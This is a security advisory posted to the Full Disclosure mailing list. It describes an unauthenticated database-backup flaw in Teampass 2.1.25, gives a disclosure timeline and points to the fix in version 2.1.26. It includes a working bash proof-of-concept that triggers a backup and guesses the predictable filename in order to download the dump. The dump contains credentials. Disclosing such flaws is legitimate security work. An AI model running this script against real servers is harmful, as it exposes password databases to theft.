[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Teampass v2.1.25 - Unauthenticated Access Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-05-25 8:48:48
Message-ID: e1b3531f-c114-5f97-facd-b6fdb237f290 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Teampass v2.1.25 - Unauthenticated Access Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1844
Release Date:
=============
2016-05-18
Vulnerability Laboratory ID (VL-ID):
====================================
1844
Common Vulnerability Scoring System:
====================================
6.8
Product & Service Introduction:
===============================
TeamPass is a Passwords Manager dedicated for managing passwords in a collaborative way on any \
server Apache, MySQL and PHP. It is especially designed to provide passwords access security \
for allowed people.
(Copy of the Homepage: http://teampass.net/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple vulnerabilities in the \
official Teampass v2.1.25 application.
Vulnerability Disclosure Timeline:
==================================
2016-05-11: Researcher Notification & Coordination (Peter Kok)
2016-05-12 Vendor Notification (Teampass Security Team)
2016-05-12: Vendor Response/Feedback (Teampass Security Team)
2016-05-13: Vendor Fix/Patch (Teampass Developer Team)
2016-05-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Nils Laumaillé
Product: Teampass Password Manager - Online Service (Web-Application) 2.1.25
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An unauthenticated access vulnerability has been discovered in the official Teampass v2.1.25 \
application. The vulnerability allows remote attacker unauthenticated access to sensitive \
database management system information.
The script /backups/script.backup.php allows administrators to create database backups. There \
are 3 problems with this script ...
- there is no authentication needed to run the script
- the backups are stored within the webroot in the /backups directory
- the name of the backup is predictable as it uses the name bck_cpassman-[epoch time].sql by \
default
These backup contains all lot of sensitive data. Usernames, hashed passwords, description \
fields with information, etc.. As most of the passwords inserted by users are hashed, some are \
visible in clear text like:
- the database password
- in the teampass_misc table there are clear text password for smtp and ldap connections
The security risk of the vulnerability is estimated as high with a cvss (common vulnerability \
scoring system) count of 6.8. Exploitation of the security web vulnerability requires no \
privileged web-application user account and user interaction. Successful exploitation of the \
vulnerability results in unauthenticated access of dumps and physical database information.
Vulnerable Module(s):
[+] ./backups/
Vulnerable File(s):
[+] script.backup.php
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without user interaction or privileged \
user account. For security demonstration or to reproduce the issue follow the provided \
information and steps below to continue.
PoC: Exploit
#!/bin/bash
#/backups/script.backup.php in Teampass 2.1.25 and earlier allows unauthenticated access
# Default Teampass database backup filename is bck_cpassmann-[current epoch time].sql and
# is stored in the backups directory.
# Only thing we have to do is get the epoch time at which the database backup was generated.
# First the script gets the server time from the index.php page, runs the script.backup.php
# to create the backup and again gets the current server time from the index.php.
# As we now know in which period the backup is created we can guess the filename
BACKUPFILENAME=bck_cpassman
if [ ! "$1" ]
then
echo "Usage: $0 [url] [options]"
echo -e "nOptions:"
echo -e "t--increase increase timezone until backup is found(default)"
echo -e "t--decrease decrease timezone until backup is found"
exit 0
fi
#get current server time from login page before generating the backup
S_SERVERTIME=$(curl -k -s $1/|grep "fa fa-clock-o"|rev|awk '{ print $1 }' |rev)
S_EPOCHTIME=$(date +%s -d "$S_SERVERTIME")
#generate backup
curl -k $1/backups/script.backup.php
#get current server time from login page after generating the backup
E_SERVERTIME=$(curl -k -s $1/|grep "fa fa-clock-o"|rev|awk '{ print $1 }' |rev)
E_EPOCHTIME=$(date +%s -d "$E_SERVERTIME")
while :
do
i=$(($S_EPOCHTIME))
while [ $i -le $E_EPOCHTIME ]
do
echo -n "Trying to download $1/backups/$BACKUPFILENAME-$i.sql "
curl -k -s -f --output /dev/null $1/backups/$BACKUPFILENAME-$i.sql && echo "[+] DATABASE \
BACKUP FOUND!" && FOUND=1 || echo "[-] not available" if [ "$FOUND" == "1" ]
then
echo -e "n>>> Database backup available at: $1/backups/$BACKUPFILENAME-$i.sql <<<nn"
exit 0
fi
i=$(($i+1))
done
if [ "$FOUND" != "1" ] && [ "$2" == "--decrease" ]
then
S_EPOCHTIME=$(($S_EPOCHTIME-3600))
E_EPOCHTIME=$(($E_EPOCHTIME-3600))
echo "Testing with different timezone($(date -d @$S_EPOCHTIME))"
elif [ "$FOUND" != "1" ]
then
S_EPOCHTIME=$(($S_EPOCHTIME+3600))
E_EPOCHTIME=$(($E_EPOCHTIME+3600))
echo "Testing with different timezone($(date -d @$S_EPOCHTIME))"
fi
done
exit 0
Solution - Fix & Patch:
=======================
Note: The manufacturer fixed the vulnerability and an update is available for download in \
version 2.1.26.
URL: http://teampass.net/2016-05-13-release-2.1.26
Security Risk:
==============
The security risk of the vulnerabilities in the teampass application are estimated as high. \
(CVSS 6.8)
Credits & Authors:
==================
Peter Kok - [http://www.vulnerability-lab.com/show.php?user=Peter%20Kok]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list, modify, use or \
edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic